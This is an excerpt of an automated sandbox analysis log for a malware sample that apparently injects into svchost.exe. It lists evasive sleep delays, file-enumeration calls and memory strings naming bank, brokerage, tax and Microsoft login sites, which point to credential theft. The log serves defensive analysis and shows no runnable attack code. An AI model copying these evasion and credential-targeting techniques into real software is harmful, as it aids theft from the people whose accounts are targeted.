              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598686s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598573s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598340s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598124s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597687s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597568s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597323s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596546s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596325s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596218s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595671s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595343s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594687s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594578s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6968Thread sleep count: 7854 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6968Thread sleep count: 2001 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598998s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598724s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598263s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597828s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597719s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597266s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596813s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596469s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596359s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596250s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596141s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595702s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595469s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595359s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595250s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595141s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594813s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594688s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594563s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C5DBBE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C2C2A2 FindFirstFileExW,0_2_00C2C2A2
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C668EE FindFirstFileW,FindClose,0_2_00C668EE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C6698F
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C5D076
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C5D3A9
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C69642
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C6979D
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C69B2B
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C65C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C65C97
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00ECDBBE
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E9C2A2 FindFirstFileExW,2_2_00E9C2A2
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED68EE FindFirstFileW,FindClose,2_2_00ED68EE
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00ED698F
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00ECD076
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00ECD3A9
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00ED9642
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00ED979D
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00ED9B2B
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00ED5C97
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599341Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598686Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598573Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598340Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598124Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597568Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597323Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596325Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594578Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598998Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598724Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598263Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597266Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596469Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596141Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595702Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595469Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595141Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594813Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594688Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594563Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594344Jump to behavior
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcae9abfa21153<
Source: svchost.exe, 00000003.00000002.4471617531.0000000003054000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/trackingProfile>
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcad0e9d9f0038<
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4471702197.000000000346D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
